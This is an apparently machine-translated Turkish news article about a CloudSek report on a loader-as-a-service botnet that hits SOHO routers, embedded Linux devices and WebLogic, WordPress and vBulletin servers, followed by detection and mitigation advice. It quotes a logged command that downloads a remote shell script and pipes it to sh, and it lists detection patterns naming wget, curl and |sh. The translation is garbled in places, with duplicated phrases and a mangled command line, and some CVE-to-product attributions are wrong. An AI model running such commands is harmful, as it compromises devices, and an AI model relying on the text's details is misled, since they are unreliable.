CloudSek, son altı ayı kapsayan hizmet olarak yükleyici bir botnet kampanyasını ortaya çıkardı ve açık komuta ve kontrol günlüklerini SOHO yönlendiricilerine, gömülü Linux cihazlarına ve işletme uygulamalarına yönelik saldırıları düzenlemek için kullandı.
Tehdit aktörleri, uzaktan kod yürütülmesi için WebLogic, WordPress ve Vbulletin sistemlerinde NTP, Syslog ve ana bilgisayar adı alanları gibi, NTP, Syslog ve ana bilgisayar adı alanları gibi – post parametrelerden yararlanır.
Temmuz ve Ağustos 2025 arasında, saldırı hacmi%230 arttı ve Morte ikili dosyaları ve kriptominasyon yükleri de dahil olmak üzere çok mimari kötü amaçlı yazılımlar sağladı.
CloudSek, operasyonu izlemeye devam ediyor ve teknoloji yığınları hedeflenen vektörlerle eşleşen etkilenen müşterileri uyardı.
CloudSek’in Triad ekibi ilk olarak operasyonu kötü amaçlı altyapı için rutin taramalar sırasında tespit etti.
Sunucu, son 6 aylık dönemde tehdit aktörleri tarafından verilen komut ve kontrol günlüklerini içeriyordu ve bu da bize saldırı vektörleri ve kullanımda altyapı hakkında bilgi verdi.
Maruz kalan kontrol paneli kütüklerinin araştırılması, her biri saldırı zincirindeki bir aşamaya karşılık gelen metodik bir modül dizisi ortaya çıkarmıştır. Kare parantezlerdeki anahtar günlük işaretleri farklı işlevleri gösterir:
[ReplyPageLogin] Web-ADMIN arabirimlerine karşı giriş denemelerini yakalar, hem varsayılan önemli probları hem de kaba kuvvet spreylerini günlüğe kaydettirir.
Başarılı kimlik doğrulama sonraki enjeksiyon aşamalarına beslenir.
[ConfigSystemCommand] Ve [SystemCommand] Enjeksiyon komutlarını kaydedin: wget -qO- http://IP/rondo.*.sh | shmeşgul kutusu getirir veya minimal damlalık komut dosyalarının dağıtımını gösteren TFTP/FTP tabanlı zincirler.
[ReplyErrorPage] Ve [ReplySuccessPage] Sinyal yürütme hataları veya onayları, operatörün yeniden deneme mantığını yönlendirir veya yük yükleme için uzlaşmış ana bilgisayarları işaretleme.
[ReplyDeviceInfo] Sürdürülebilir C2, kriptominasyon veya erişimin yeniden satılması için yük yük seçimini uyarlamak için MAC adreslerini, ürün yazılımı sürümlerini ve ulaşılabilir hizmetleri toplama, eksploit sonrası keşifler.
Kampanya sistematik olarak hedefliyor:
- Konsol/Servlet RCE üzerinden Oracle WebLogic sunucuları.
- SOHO yönlendiricileri savunmasız kullanıcı arayüzü sayfaları (örneğin, wlwps.htm, wan_dyna.html) ve tasarlanmamış alanlar (ntp, remote_syslog, hostname, ping) aracılığıyla.
- Çok mimarlık ikili dosyaları bırakarak gömülü Linux cihazları (Morte.x86, Morte.x86_64).
- CVE-2019-17574 (Popup Maker), CVE-2019-16759 (WordPress) ve Vbulletin CVE-2012-1823 aracılığıyla CMS platformları.
Saldırganlar, cihaz türlerinde uyumluluğu en üst düzeye çıkarmak için Meşgul Kutusu sargılarıyla yük yükü teslimi için (HTTP, TFTP, FTP) birden fazla protokol kullanır.
Varsayılan kimlik bilgileri ve otomatik spreyler başlangıç erişimi kolaylaştırır. Farklı IP aralıklarını kapsayan yedek damla ana bilgisayarlar yayından kaldırmalara karşı esneklik sağlar.
İşletme sonrası operatörler, kriptominasyon ve DDOS kampanyaları için kaçırılan kaynaklardan yararlanarak JSON-RPC madencileri veya Mirai tarzı botlar kullanırlar.
İşletme Hedefleme: WebLogic firalizasyon, STRUTS2 OGNL enjeksiyonu ve JNDI istismarının dahil edilmesi, veri eksfiltrasyonu, lateral ağ hareketi ve fidye yazılımları gibi ikincil yükler riskini yükseltir.
Altyapı Uzlaşma: Kurumsal kenar yönlendiricileri bant genişliği tükenmesi, NTP zehirlenmesi yoluyla zamana duyarlı sistem kesintisiyle ve tanısal arayüzler yoluyla DNS manipülasyonuyla karşı karşıya.
Üçüncü taraf riski: Küçük işletme yönlendiricileri ve IoT cihazları, kurumsal müşterilere yönelik saldırılar için sahil başlığı olarak hizmet ederken, tehlikeye atılmış hizmet sağlayıcı altyapısı erişimi artırabilir.
Operasyonel etkiler arasında BOTNET işe alımından bozulmuş ağ performansı, çok vektör saldırılarından artan olay müdahale iş yükü ve çeşitli yüzeylerde tehdit avı için daha fazla talep bulunmaktadır.
- Çıkış Engelleme: IoT segmentlerinden giden HTTP, HTTP, TFTP ve FTP’yi reddetmek.
- Envanter ve izolasyon: İnternete maruz kalan yönetici UI’leri tanımlayın; Enjekte edilen posta desenlerini gösteren cihazları izole edin.
- Kimlik Bilgisi ve Ürün Yazılımı Güncellemeleri: Benzersiz kimlik bilgilerini uygulamak; satıcı yamaları uygulamak; Gereksizse uzaktan yönetim özelliklerini devre dışı bırakın.
Tespit (SOC/SIEM)
- İçeren şüpheli posta parametrelerini tespit etmek için Sigma kurallarını uygulayın
wget–curlveya|sh. - HTTP gövdelerinde indir ve denetim desenleri için Suricata/Snort Regex uyarılarını dağıtın.
- Kriptominasyon aktivitesini gösteren olağandışı JSON-RPC trafiğini izleyin.
Önleme (Ağ/SECOPS)
- Ürün yazılımı ve NTP için yalnızca beyaz liste güncelleme sunucularına izin vermek için katı çıkış filtrelemesini uygulayın.
- Çekirdek üretim ağlarından IoT ve gömülü cihazlar segmenti.
- VPN veya Jump-Box erişiminin arkasındaki Web UI’leri harden.
Yanıt (IR)
- Giden madencilik veya beklenmedik olan karantina cihazları
/tmp/morte.*infazlar. - Adli eserler toplayın: kabuk komut günlükleri, işlem ağaçları ve geçici dosya sistemi içeriği.
- Dürüstlüğü geri yüklemek için yeniden görüntüleme veya değiştirilemez cihazları değiştirin.
CloudSek Tahminleri, genişletilmiş cihaz hedefleme ve yük yükü sofistike ile bu hizmet olarak bu yükleyici işleminin evrimine devam ediyor. Uyanık izleme, hızlı iyileştirme ve katmanlı savunma stratejileri, ortaya çıkan bu tehdidi azaltmak için kritik öneme sahiptir.
Anında güncellemeler almak ve GBH’yi Google’da tercih edilen bir kaynak olarak ayarlamak için bizi Google News, LinkedIn ve X’te takip edin.